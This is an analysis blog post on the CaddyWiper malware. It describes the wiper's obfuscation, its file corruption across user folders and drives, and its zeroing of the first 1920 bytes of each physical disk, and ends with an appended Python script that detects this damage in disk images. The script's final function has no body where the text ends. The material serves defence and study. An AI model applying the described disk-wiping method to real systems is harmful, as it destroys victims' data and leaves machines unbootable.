margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 16pt; 
font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Summary</span></h2><br /><ul style="margin-bottom: 0px; margin-top: 0px; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Name: CaddyWiper</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Discovered in March 2022</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Was used in a targeted attack in Ukraine</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; 
text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Deployed via Microsoft Active Directory GPO</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Corrupts files and disk partitions</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">PE32 sample written in C++</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Compiled on the same day when it was deployed on targeted systems in Ukraine</span></p></li></ul><div style="text-align: right;"><span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><i>by Denis Popov</i></span></span></div><div style="text-align: justify;"><span 
style="font-family: Arial;"><span><a name='more'></a></span></span></div><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt; text-align: justify;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Introduction</span></h2><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: white; color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">On March 14, 2022, ESET Research </span><a href="https://twitter.com/ESETresearch/status/1503436420886712321" style="text-decoration-line: none;"><span style="background-color: white; color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">found</span></a><span style="background-color: white; color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> a new disruptive malware deployed in Ukraine. It was named CaddyWiper, and it is already the third wiper found on Ukrainian systems. The previous ones were WhisperGate and HermeticWiper. 
</span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Like HermeticWiper, CaddyWiper was deployed via Microsoft Active Directory GPO.</span></p><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Technical Details</span></h2><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Overview</span></h3><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The CaddyWiper sample was written in C++ and has a compilation timestamp of 14-03-2022, which matches the day it was deployed on the victim's system. 
This sample has only 10 functions.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 369px; overflow: hidden; width: 581px;"><img height="369" src="https://lh3.googleusercontent.com/YnjOocG8DN4xnSwyuzqYedF2OM44cDrqZGgZHpbUatdBgRUw2MFn4oPG53B0gTwgth8YDv50hj89IT8-2Mx7NuCBWBcjV16F90cphxUDNZka7Sq4zSsscif9ySx7G_CDwkrQYr8L" style="margin-left: 0px; margin-top: 0px;" width="581" /></span></span></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Execution</span></h3><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">All code in the sample is obfuscated in an interesting way. All strings are separated by one character. 
Even function calls are obfuscated in the same way, so the malware statically imports only one function from one library; the rest are resolved during execution.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 307px; overflow: hidden; width: 283px;"><img height="307" src="https://lh3.googleusercontent.com/CLSw1q-3eBbXSBxqFuFQ8bbTJx7aQLP7Prlv8pbFlBXI0rmB7Te6tRfMiPKieCYLFauEyi84yQ4B-r2WmeA5TEPCGti0zN_oJ-MzwkmNH7IlXF8z2tX4v9dmwbv4uELfa9z8Ayx2" style="margin-left: 0px; margin-top: 0px;" width="283" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CaddyWiper determines the machine's role in the domain using the ‘DsRoleGetPrimaryDomainInformation’ function. 
If the returned value is ‘DsRole_RolePrimaryDomainController’, the wiper terminates; otherwise, it proceeds.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 314px; overflow: hidden; width: 451px;"><img height="314" src="https://lh6.googleusercontent.com/5UVnXiJKQutf7eUXGmjIyJCroNuFE6wgA7KCVNljHMPVfOr8pCNXCexmR0QooteOp5SUpllFkek7LkcmWrufof7seK9wYi4XuUDmNpk2DqhNuPCn5CPVjNqKhJ9m6QkMryCT7jTk" style="margin-left: 0px; margin-top: 0px;" width="451" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The first folder CaddyWiper operates on is “C:\Users”. The file corruption routine is the ‘<i>sub_6522A0()</i>’ function. 
</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span id="docs-internal-guid-810a655d-7fff-8106-42a2-aa030999230b"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 334px; overflow: hidden; width: 416px;"><img height="334" src="https://lh6.googleusercontent.com/qCn7S39V0pKw1At06rbXVl6GwURWi01lON0qXtCJQBnNsg2crrjXtIVWtKzPR59jmkesJU_bYL5wcDbjeakyWdPHhx5OLwDCl9Bz3L6ntWleQHx27La6axIELqr8Y5t5UABeR1HP" style="margin-left: 0px; margin-top: 0px;" width="416" /></span></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">During ‘<i>sub_6522A0()</i>’ execution the wiper loads and uses the following functions:</span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><ul style="margin-bottom: 0px; margin-top: 0px; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">FindFirstFileA</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: 
baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">FindNextFileA</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CreateFileA</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">LocalAlloc</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">SetFilePointer</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: 
pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">WriteFile</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">LocalFree</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CloseHandle</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">FindClose</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" 
role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">SetEntriesInAclA</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">AllocateAndInitializeSid</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">SetNamedSecurityInfoA</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">GetCurrentProcess</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p 
dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">OpenProcessToken</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">FreeSid</span></p></li></ul><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">If the current file is used by another process, CaddyWiper obtains access to it using “SeTakeOwnershipPrivilege”. The first file in the system which CaddyWiper overwrites is ‘<i>C:\Users\desktop.ini’</i>. After overwriting this file the desktop background will be deleted and all shortcuts will be unusable. 
</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 127px; overflow: hidden; width: 624px;"><img height="127" src="https://lh3.googleusercontent.com/1mHgGrGX8tXOjJLa-v_5SLiQq_egvlQEQjtPqsFRqospVmqdsN4E70EVm7AgRLoB_n0nbwD7Uqg0DjyAFVQgKzXX3GIxH9hVtaRC9dzYPK9VVUEC89HQtxDKI9CoLepfSgaepBTq" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 247px; overflow: hidden; width: 273px;"><img height="247" src="https://lh4.googleusercontent.com/3JQRD9R9-SkkkKFba5Fzza3Ci-eBibCE51Zrb96sbJL3UoofznIu_VdCIfOsQX_N3AIpEafvASuYGb7BdYKED8pme7mF9oP0EJb3TjWTkcdBn7NLhzzJ3VGPskfzo2tfqNyrDGoJ" style="margin-left: 0px; margin-top: 0px;" width="273" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">After corrupting the ‘<i>C:\Users</i>’ folder, the malware moves on to the ‘<i>D:\</i>’ logical drive. If it is present, the malware corrupts its files in the same way. This operation is repeated for all logical drives from ‘<i>D:\</i>’ to ‘<i>Z:\</i>’. 
Once these drives are absent or their file corruption is complete, it calls the ‘<i>sub_4011D0()</i>’ function, which corrupts the disk partitions.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 454px; overflow: hidden; width: 409px;"><img height="454" src="https://lh4.googleusercontent.com/G9Ah_YOTp0sVqsuI2ZkpSYLZHCOl0kCG759RiZT3q8Cva97pgQP-qBegcBhGGUpyMnQGqjzN6KMFUP4weWnaqKiyx2yXN-pBt9QBKKHU1wQSDqruvriJxApf8-cZGiF3EyryzK7V" style="margin-left: 0px; margin-top: 0px;" width="409" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">To corrupt the disks, CaddyWiper obtains access to the disk partitions from ‘<i>\\.\PHYSICALDRIVE9</i>’ to ‘<i>\\.\PHYSICALDRIVE0</i>’ and overwrites the first 1920 bytes of each with zeros using the ‘CreateFileW’ and ‘DeviceIoControl’ functions. 
This operation succeeds only if the malware is executed as administrator.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 250px; overflow: hidden; width: 287px;"><img height="250" src="https://lh4.googleusercontent.com/woHyA4vTl1Fr8yoGqn17xSEs6xi_Pa3xmjXe2ugX7hgFkt-WKJNUVvirjKRw1XjgfILWLlUeUy51-AqCU2JcP7V9F1e0m0EOdKLew3j72jHxgcy3NysAkBofn8ADeXu4hVg5zbss" style="margin-left: 0px; margin-top: 0px;" width="287" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Overwriting the first 0x780 (1920 in decimal) bytes</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 335px; overflow: hidden; width: 434px;"><img height="335" src="https://lh6.googleusercontent.com/WYZzmSmK-eFYT7TNAK3BB7J5wx_IGUaV1Vopr-HM0uApoc-93Q_9VMztj540dZjMPXYnSFujTfalB91x5bvF0N_V4Yul_9VSSDo4She-_KBsd7fWovRX798P4jE0uL2tRLlVhG5A" style="margin-left: 0px; margin-top: 0px;" width="434" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">After the disk partitions are corrupted, the machine reboots, but the 
system does not start; instead, the “<i>FATAL: INT18: BOOT FAILURE</i>” message is shown on the screen.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 299px; overflow: hidden; width: 537px;"><img height="299" src="https://lh4.googleusercontent.com/LoTmyO1xW0CPMfE3nP0_H7u-W164atz7F0ErfL0kiXtvjjFqM7WbSn1ErUr256CKL8XgQ0lBR0nsEOpkUA-RP2huhFuvJKqtIylA8WFAVUWgoiVnSP7ummALH5lgJwaSKukIhc4L" style="margin-left: 0px; margin-top: 0px;" width="537" /></span></span></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt; text-align: justify;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Obfuscation</span></h3><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">All function and library names are stored separated in the PE file. 
The malware also obfuscates its WinAPI calls.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 353px; overflow: hidden; width: 524px;"><img height="353" src="https://lh6.googleusercontent.com/qStMUo5fJs7zp-vjJFJ3PsfcJXa2pT4ew-879AM7Oyvo1ZIBkEkilwUG_EV5eRrWhvhNvUrxJpn-wgUzQ7XXgsQ4SWsVaHB52Hbaa1ZCPxGAafW554bjHXHQx7X31w9-he0iC22S" style="margin-left: 0px; margin-top: 0px;" width="524" /></span></span></p><br /><br /><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Conclusion</span></h2><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CaddyWiper continues the trend of data wipers in Ukraine. It is the third one found; the previous ones were <a href="https://www.nioguard.com/2022/01/analysis-of-whispergate.html" target="_blank">WhisperGate</a> and HermeticWiper. CaddyWiper has no similarities with them but, like HermeticWiper, was deployed via a Microsoft Active Directory GPO. The analyzed sample has obfuscated strings and API calls. It has two main disruptive functions: one corrupts files in the ‘<i>C:\Users</i>’ folder and on logical drives from ‘<i>D:\</i>’ to ‘<i>Z:\</i>’; the second overwrites disk partitions from ‘\\.\PHYSICALDRIVE9’ to ‘\\.\PHYSICALDRIVE0’. 
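As an added example (not code from the original post), the Python triage check below looks for exactly the disk damage described above in a raw disk image: the first 0x780 (1920) bytes zeroed, which destroys the MBR boot signature at offset 510 and, on a GPT disk, the "EFI PART" header in sector 1, while data beyond the window is untouched. It assumes 512-byte sectors, and the sample images it runs on are constructed inline.

```python
"""Triage a raw disk image for the 1920-byte zero-overwrite pattern reported for CaddyWiper.

Added example, not the post's own code. Assumes 512-byte sectors and checks only
the behaviour the analysis reports: the first 0x780 bytes of each physical drive
are overwritten with zeros. Sample images are constructed inline.
"""
import struct

WIPED_PREFIX_LEN = 0x780          # 1920 bytes, as reported in the analysis
SECTOR = 512
MBR_SIGNATURE_OFFSET = 510        # 0x55AA boot signature ends sector 0
MBR_SIGNATURE = b"\x55\xaa"
GPT_HEADER_OFFSET = SECTOR        # GPT header lives at LBA 1 on 512-byte-sector disks
GPT_SIGNATURE = b"EFI PART"


def leading_zero_run(data: bytes) -> int:
    """Number of consecutive 0x00 bytes at the start of data."""
    n = 0
    for b in data:
        if b != 0:
            break
        n += 1
    return n


def zeroed_sector_map(image: bytes) -> dict:
    """Per-sector (zero_bytes, bytes_checked) inside the 0x780-byte window.

    The window covers LBA 0, LBA 1, LBA 2 fully and the first 384 bytes of LBA 3,
    i.e. the (protective) MBR, the GPT header and part of the partition entries.
    """
    result = {}
    for lba in range((WIPED_PREFIX_LEN + SECTOR - 1) // SECTOR):
        start = lba * SECTOR
        end = min(start + SECTOR, WIPED_PREFIX_LEN)
        chunk = image[start:end]
        result[lba] = (sum(1 for b in chunk if b == 0), end - start)
    return result


def assess_disk_prefix(image: bytes) -> dict:
    """Classify the start of a raw disk image against the reported wipe pattern.

    Individual observations are returned alongside the verdict so an analyst can
    see which on-disk structures survived.
    """
    zero_run = leading_zero_run(image[:WIPED_PREFIX_LEN])
    mbr_sig_ok = image[MBR_SIGNATURE_OFFSET:MBR_SIGNATURE_OFFSET + 2] == MBR_SIGNATURE
    gpt_sig_ok = image[GPT_HEADER_OFFSET:GPT_HEADER_OFFSET + 8] == GPT_SIGNATURE
    # Data right after the window is expected to be intact on a wiped disk:
    # that is what distinguishes this pattern from a blank or fully zeroed image.
    beyond = image[WIPED_PREFIX_LEN:WIPED_PREFIX_LEN + SECTOR]
    intact_beyond = any(beyond)
    verdict = zero_run >= WIPED_PREFIX_LEN and not mbr_sig_ok and not gpt_sig_ok
    return {
        "leading_zero_bytes": zero_run,
        "mbr_signature_present": mbr_sig_ok,
        "gpt_signature_present": gpt_sig_ok,
        "data_intact_after_0x780": intact_beyond,
        "matches_caddywiper_pattern": verdict,
    }


def build_sample_gpt_disk(total_bytes: int = 8 * SECTOR) -> bytes:
    """Constructed test data: a minimal fake GPT-style disk image.

    Sector 0: a couple of fake boot-code bytes, one 0xEE protective partition
    entry at offset 446 and the 0x55AA signature. Sector 1: "EFI PART" header.
    Sectors 2 and up: partition entry array filled with a recognizable pattern.
    """
    img = bytearray(total_bytes)
    img[0:2] = b"\xeb\x3c"                       # fake boot code (constructed)
    # status, CHS start, type 0xEE, CHS end, starting LBA, size in sectors
    entry = struct.pack("<B3sB3sII", 0x00, b"\x00\x02\x00", 0xEE,
                        b"\xff\xff\xff", 1, 0xFFFFFFFF)
    img[446:446 + 16] = entry
    img[MBR_SIGNATURE_OFFSET:MBR_SIGNATURE_OFFSET + 2] = MBR_SIGNATURE
    img[GPT_HEADER_OFFSET:GPT_HEADER_OFFSET + 8] = GPT_SIGNATURE
    for off in range(2 * SECTOR, total_bytes):
        img[off] = 0xA5
    return bytes(img)


def constructed_wiped_image(image: bytes) -> bytes:
    """Return a copy of a constructed image with the reported damage applied in
    memory, so the detector can be exercised offline on sample data."""
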